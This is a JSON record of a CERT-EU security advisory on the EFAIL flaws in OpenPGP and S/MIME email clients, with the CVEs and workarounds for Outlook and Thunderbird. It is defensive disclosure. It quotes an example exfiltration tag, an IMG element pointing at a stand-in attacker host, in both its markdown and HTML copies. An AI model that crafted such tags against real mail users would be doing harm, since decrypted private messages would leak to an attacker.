{
    "file_item": {
        "filepath": "security-advisories",
        "filename": "CERT-EU-SA2018-014.pdf"
    },
    "title": "Vulnerabilities in OpenPGP and S/MIME Client Implementations",
    "serial_number": "2018-014",
    "publish_date": "14-05-2018 15:01:00",
    "description": "On 14th of May 2018, security researchers released technical details<br>concerning vulnerabilities impacting OpenPGP and S/MIME encryption<br>technologies. These vulnerabilities abuse e-mail clients rendering HTML<br>content when displaying e-mails to exfiltrate plaintext content of<br>OpenPGP or S/MIME encrypted email. Security researchers named those<br>vulnerabilities EFAIL.",
    "url_title": "2018-014",
    "content_markdown": "---\ntitle: 'Vulnerabilities in OpenPGP and S/MIME Client Implementations'\nversion: '1.0'\nnumber: '2018-014'\ndate: 'May 14, 2018'\n---\n\n_History:_\n\n* _14/05/2018 --- v1.0: Initial publication_\n\n# Summary\n\nOn 14th of May 2018, security researchers released technical details concerning vulnerabilities impacting OpenPGP and S/MIME encryption technologies [1]. These vulnerabilities abuse e-mail clients rendering HTML content when displaying e-mails to exfiltrate plaintext content of OpenPGP or S/MIME encrypted email. Security researchers named those vulnerabilities __EFAIL__.\n\nTo exploit the vulnerabilities, the attacker needs to encapsulate previously captured encrypted content in an HTML e-mail sent to the victim. If the victim's e-mail client is rendering HTML and allows content download from external websites, the decrypted content can be attached to the outgoing request.\n\n\n# Technical Details\n\nThe __EFAIL__ paper describes two types of attacks.\n\nThe first one (Direct Exfiltration) consists of encapsulating the PGP or S/MIME content inside HTML tags (such as `<IMG src=\"http://attacker.eu/\">`). When the client decrypts the encrypted part, the plaintext is concatenated to the HTML tag URL. If the e-mail client is authorized to fetch content from an external source, the HTTP(S) request performed contains the decrypted message.\n\nThe second attack type consist of injecting HTML tags into encrypted plaintext by abusing CBC mode (S/MIME) or CFB mode (OpenPGP). To successfully exploit these flaws, the attacker needs a part of the plaintext message. In most cases, S/MIME and PGP encrypted messages start with specific strings, allowing the attacker to perform the attack. If successful, the plaintext message is concatenated to the HTML tag URL and -- again -- if the e-mail client is authorized to fetch content from an external source, the HTTP(S) request performed contains the decrypted message.\n\nTwo CVEs were provided for the CBC/CFB gadget attacks:\n\n * CVE-2017-17688: OpenPGP CFB gadget attacks\n * CVE-2017-17689: S/MIME CBC gadget attacks\n\n# Products Affected\n\nMost S/MIME and OpenPGP implementations in popular e-mail clients are affected by those vulnerabilities. Some of them, like Enigmail, already patched the vulnerability in their latest version.\n\n# Recommendations\n\nUpgrade to the most recent version of e-mail clients and PGP or S/MIME implementations when available.\n\n## Workarounds\n\nIs is highly recommended to disable HTML rendering in e-mail clients or at least deny downloads from external sources in HTML emails.\n\nFor Outlook 2016:\n\n * in `File` > `Options`\n * `Trust Center` > `Trust Center Settings...`\n * `E-mail security` > Check `Read all standard mail in plaintext` and `Read all digitally signed mail in plaintext`\n\nFor Thunderbird:\n\n * In `View` > `Message Body As`\n * Select `Plain text`\n\n\n# References\n\n[1] <https://efail.de/>\n\n[2] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-17688>\n\n[3] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-17689>\n",
    "content_html": "<p><em>History:</em></p><ul><li><em>14/05/2018 --- v1.0: Initial publication</em></li></ul><h2 id=\"summary\">Summary</h2><p>On 14th of May 2018, security researchers released technical details concerning vulnerabilities impacting OpenPGP and S/MIME encryption technologies [1]. These vulnerabilities abuse e-mail clients rendering HTML content when displaying e-mails to exfiltrate plaintext content of OpenPGP or S/MIME encrypted email. Security researchers named those vulnerabilities <strong>EFAIL</strong>.</p><p>To exploit the vulnerabilities, the attacker needs to encapsulate previously captured encrypted content in an HTML e-mail sent to the victim. If the victim's e-mail client is rendering HTML and allows content download from external websites, the decrypted content can be attached to the outgoing request.</p><h2 id=\"technical-details\">Technical Details</h2><p>The <strong>EFAIL</strong> paper describes two types of attacks.</p><p>The first one (Direct Exfiltration) consists of encapsulating the PGP or S/MIME content inside HTML tags (such as <code>&lt;IMG src=\"http://attacker.eu/\"&gt;</code>). When the client decrypts the encrypted part, the plaintext is concatenated to the HTML tag URL. If the e-mail client is authorized to fetch content from an external source, the HTTP(S) request performed contains the decrypted message.</p><p>The second attack type consist of injecting HTML tags into encrypted plaintext by abusing CBC mode (S/MIME) or CFB mode (OpenPGP). To successfully exploit these flaws, the attacker needs a part of the plaintext message. In most cases, S/MIME and PGP encrypted messages start with specific strings, allowing the attacker to perform the attack. If successful, the plaintext message is concatenated to the HTML tag URL and -- again -- if the e-mail client is authorized to fetch content from an external source, the HTTP(S) request performed contains the decrypted message.</p><p>Two CVEs were provided for the CBC/CFB gadget attacks:</p><ul><li>CVE-2017-17688: OpenPGP CFB gadget attacks</li><li>CVE-2017-17689: S/MIME CBC gadget attacks</li></ul><h2 id=\"products-affected\">Products Affected</h2><p>Most S/MIME and OpenPGP implementations in popular e-mail clients are affected by those vulnerabilities. Some of them, like Enigmail, already patched the vulnerability in their latest version.</p><h2 id=\"recommendations\">Recommendations</h2><p>Upgrade to the most recent version of e-mail clients and PGP or S/MIME implementations when available.</p><h3 id=\"workarounds\">Workarounds</h3><p>Is is highly recommended to disable HTML rendering in e-mail clients or at least deny downloads from external sources in HTML emails.</p><p>For Outlook 2016:</p><ul><li>in <code>File</code> &gt; <code>Options</code></li><li><code>Trust Center</code> &gt; <code>Trust Center Settings...</code></li><li><code>E-mail security</code> &gt; Check <code>Read all standard mail in plaintext</code> and <code>Read all digitally signed mail in plaintext</code></li></ul><p>For Thunderbird:</p><ul><li>In <code>View</code> &gt; <code>Message Body As</code></li><li>Select <code>Plain text</code></li></ul><h2 id=\"references\">References</h2><p>[1] <a rel=\"noopener\" target=\"_blank\" href=\"https://efail.de/\">https://efail.de/</a></p><p>[2] <a rel=\"noopener\" target=\"_blank\" href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-17688\">https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-17688</a></p><p>[3] <a rel=\"noopener\" target=\"_blank\" href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-17689\">https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-17689</a></p>",
    "licence": {
        "title": "Creative Commons Attribution 4.0 International (CC-BY 4.0)",
        "link": "https://creativecommons.org/licenses/by/4.0/",
        "restrictions": "https://cert.europa.eu/legal-notice",
        "author": "The Cybersecurity Service for the Union institutions, bodies, offices and agencies"
    }
}